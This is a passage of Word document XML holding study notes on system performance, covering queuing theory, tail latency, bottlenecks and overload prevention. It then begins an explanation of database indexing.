    <w:p w14:paraId="5395B2A2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  L = λ × W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F2C320" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Concurrency = Throughput × Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C346708" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316197E4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080CD495" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    Latency spike at constant throughput → linear concurrency increase → resource exhaustion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4407EE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    Want more throughput at same latency → need proportionally more concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF13152" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    Reduce latency → can maintain throughput with less concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FDD402" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="5EBB1390" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The M/M/1 Non-Linear Regime:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EA560D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  W = 1 / (μ × (1 - ρ))    where ρ = utilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF4204B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5987A27B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  At 50% util: 2× baseline latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43711C3B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  At 80% util: 5× baseline latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6554CB37" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  At 90% util: 10× baseline latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0104D746" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  At 95% util: 20× baseline latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C34730" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8EBD1A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Design target: run at 50-70% utilization under normal load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF96A6C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Headroom is not waste — it is the buffer between linear and non-linear latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04747682" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="02F31D14" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Tail Latency Amplification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AF3ACE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  P(exceed T | N parallel calls) = 1 - P(single call &lt; T)^N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346FCB51" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD7A663" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  p99 single call = p1 for N=100 parallel calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F16F423" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Fan-out amplifies tail latency: every microservice call multiplies tail probability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA0CA31" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39798DB9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Solutions: hedged requests (redundant slow calls), reduce fan-out,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073EB678" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">             improve individual service p99, timeout &lt; p999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEADF48" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="4C847DC9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The Throughput-Latency Trade-off Dial:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DA5D71" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Batching:      more throughput, more latency (wait to fill batch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F6E3A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Async I/O:     more throughput, same or lower latency (no blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7974670E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Compression:   more effective throughput, more CPU latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A288F0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Caching:       dramatically lower latency, higher throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C2026" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Parallelism:   more throughput, same latency (if no contention)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761A3E26" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Lock-free:     more throughput at high concurrency, same latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF3622" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135C99C9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The Bottleneck Principle (Theory of Constraints):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628468EB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  System throughput = bottleneck resource throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB9E25B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Optimizing non-bottlenecks: zero impact on system throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522D6E83" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Optimizing bottlenecks: direct throughput improvement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F56CEF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6960E264" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Bottleneck identification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DA00CD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    Highest utilization resource + longest queue = bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5D9694" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    USE method: Utilization, Saturation, Errors per resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7366B15C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="45AF1187" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Latency Decomposition (what to measure and fix):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684052AA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Total = Processing + Queuing + Network + Serialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B02FCF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3026C8D4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Low load: processing dominates → optimize algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF3426F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  High load: queuing dominates → reduce utilization, scale out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414878DC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Remote calls: network dominates → geographic proximity, connection reuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14517647" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Data transfer: serialization dominates → binary protocols, compression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143339EB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="0C41A1B9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The Overload Collapse Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE5F645" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  At saturation: throughput plateaus, latency grows without bound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D259A85" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Beyond saturation: retries amplify load → throughput actually decreases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A5B7E9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8D2615" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FAD590" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    Backpressure: reject excess load with 429/503 before queue fills</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDFB860" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Load shedding: drop low-priority work first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB10428" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    Circuit breakers: stop retrying failing services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF93EBC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    Rate limiting: bound incoming load at sustainable levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E881B9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="10C55E5E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Measurement Correctness:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC1EC8C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Coordinated omission: benchmarks that stop sending during slow periods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709CC419" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                        underreport latency dramatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491BDC0E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Use: wrk2, JMH with rate control, Gatling — tools that maintain fixed arrival rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD5F15B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46991BF5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Percentiles over averages: p99 captures tail users, average hides them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD24F0E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  HdrHistogram: accurate tail latency measurement with minimal memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712FD01B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F9E1C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Profiling for root cause:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53716D37" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    Sampling profiler (perf, async-profiler): CPU bottlenecks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4177B70A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    eBPF (bpftrace): kernel-level latency sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B5CF3B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    Allocation profiler: GC pressure and memory overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DBC0AE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">    Flame graphs: visualize where time/allocations are spent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467BC088" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>latency and throughput are not two dials you can turn independently — they are coupled properties of the same physical system, related by the mathematics of queuing, constrained by the physics of computation, and subject to non-linear collapse as utilization approaches capacity.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> The engineers who consistently build systems that are both fast and high-throughput understand three things that most don't: first, that </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the M/M/1 non-linear regime is not a theoretical curiosity but a daily operational reality</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> — systems running at 80% utilization experience 5× baseline latency, and most production systems run at 80%+ during peak; second, that </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tail latency is the user experience, not the median</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> — a system with excellent p50 but terrible p99 provides excellent experience for half of requests and catastrophic experience for the other half, amplified further by fan-out; third, that </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>measuring performance correctly is as hard as improving it</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve"> — coordinated omission, averaged percentiles, and poorly configured benchmarks produce measurements that look good </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>while the system is actively failing real users. The work is to measure accurately, understand the queue theory mechanics causing what you observe, identify the binding constraint using the USE or RED methods, and apply the right tool — batching for throughput, hedging for tail latency, async I/O for concurrency, lock-free structures for contention — to address the actual bottleneck rather than the one that's most familiar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC46752" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Indexing in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBC942D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Indexing Really Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8D3EAA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>An index is a data structure that improves the speed of data retrieval operations on a database table at the cost of additional storage space and slower writes. It's a secondary structure that maps search keys to the physical location of the corresponding data, enabling the database to find rows without scanning the entire table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A9E211" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental analogy — a book's index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5265A3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1449"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Without an index: to find "B-Tree" in a 1000-page book, you read every page sequentially (full scan).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1218A6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1449"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>With an index: look up "B-Tree" in the back-of-book index → "pages 142, 307, 891" → jump directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A486A7F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The database equivalent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472A944E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47884C14" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Without index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DB69A4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  SELECT * FROM users WHERE email = 'alice@example.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46709244" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Scan ALL 10 million rows. Check each row's email. Return match.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A824CD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → O(n): 10,000,000 row comparisons. Time: 5–30 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3898AE1B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="545C0F49" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>With index on email:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC33650" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Look up 'alice@example.com' in index structure (B-Tree traversal).</w:t>
      </w:r>
    </w:p>
